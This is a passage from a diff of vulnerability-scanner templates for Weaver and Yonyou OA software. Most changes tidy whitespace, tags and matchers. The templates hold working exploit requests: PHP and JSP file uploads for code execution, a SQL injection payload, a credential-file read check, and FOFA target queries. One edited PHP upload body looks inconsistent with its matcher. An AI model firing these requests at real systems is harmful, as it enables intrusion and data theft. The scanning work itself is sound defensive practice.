          - "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')"
          - "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
--- a/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
+++ b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
@ -33,7 +33,7 @@ http:
    matchers-condition: and
    matchers:
      - type: dsl
-        dsl: 
+        dsl:
          - "status_code_1 == 200 && contains(body_1,'{{timestamp}}')"
          - "status_code_2 == 200 && contains(body_2,'<title>新建')"
-        condition: and
+        condition: and
--- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
@ -1,7 +1,7 @@
 id: weaver-office-server-file-upload
 info:
-  name: OA E-Office OfficeServer.php Arbitrary File Upload 
+  name: OA E-Office OfficeServer.php Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
@ -12,7 +12,7 @@ info:
    max-request: 1
    fofa-query: app="泛微-EOffice"
    verified: true
-  tags: weaver,e-office,oa,rce,intrusive,file-upload
+  tags: weaver,e-office,oa,rce,intrusive,fileupload
 variables:
  filename: "{{to_lower(rand_base(5))}}"
@ -31,9 +31,7 @@ http:
        Content-Disposition: form-data;name="FileData";filename="{{filename}}.php"
        Content-Type: application/octet-stream
-        <?php
+        <?php echo md5(weaver);?>'
        phpinfo();
        ?>
        ------WebKitFormBoundaryLpoiBFy4ANA8daew
        Content-Disposition: form-data;name="FormData"
@ -50,9 +48,7 @@ http:
      - type: word
        part: body_2
        words:
-          - "PHP Version"
+          - "758058d8987e7a9ec723bcdbec6c407e"
          - "PHP Extension"
        condition: and
      - type: status
        status:
--- a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
+++ b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
@ -24,8 +24,8 @@ http:
      - type: word
        part: body
        words:
-          - "datapassword"
+          - "datapassword ="
-          - "datauser"
+          - "datauser ="
        condition: and
      - type: status
--- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
@ -44,7 +44,7 @@ http:
    matchers-condition: and
    matchers:
      - type: dsl
-        dsl: 
+        dsl:
          - "status_code_1 == 200"
          - "contains(body_2, 'imageSrc') && contains(body_2, 'height')"
          - "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
--- a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
@ -11,7 +11,7 @@ info:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml
  metadata:
    fofa-query: app="泛微-协同办公OA"
-  tags: ecology,upload,fileupload,intrusive
+  tags: ecology,fileupload,intrusive
 variables:
  filename: "{{to_lower(rand_base(5))}}"
@ -65,12 +65,12 @@ http:
        internal: true
        group: 1
        regex:
-          - "&fileid=(.*?)\'>"
+          - "&fileid=(.*?)\\'>"
    matchers-condition: and
    matchers:
      - type: dsl
-        dsl: 
+        dsl:
          - "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')"
          - "status_code_2 == 200 && contains(body_2, 'println')"
          - "status_code_3 == 200 && contains(body_3,'{{string}}')"
--- a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
@ -9,7 +9,7 @@ info:
  reference: |
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
-    max-request: 2  
+    max-request: 2
    fofa-query: body="远程通CHANJET_Remote"
    verified: true
  tags: yonyou,chanjet,sqli
--- a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
@ -12,7 +12,7 @@ info:
    max-request: 1
    fofa-query: app="用友-UFIDA-NC"
    verified: true
-  tags: yonyou,fileupload,intrusive
+  tags: yonyou,file-upload,intrusive
 variables:
  file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
--- a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
@ -9,6 +9,11 @@ info:
    - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
  tags: yonyou,grp,xxe,sqli
 variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"
 http:
  - raw:
      - |
@ -17,13 +22,14 @@ http:
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
-        cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
+        cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{num1}}%2a{{num2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
-          - "1759837260"
+          - "{{result}}"
      - type: word
        words:
--- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
@ -10,9 +10,9 @@ info:
    - https://www.seebug.org/vuldb/ssvid-99547
    - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
  metadata:
-    max-request: 2  
+    max-request: 2
    fofa-query: app="用友-UFIDA-NC
-    verified: true  
+    verified: true
  tags: yonyou,intrusive,ufida,fileupload
 variables:
--- a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
@ -10,7 +10,7 @@ info:
    max-request: 2
    fofa-query: body="用友U8CRM"
    verified: true
-  tags: yonyou,fileupload,u8-crm
+  tags: yonyou,file-upload,u8-crm,intrusive
 http:
  - raw: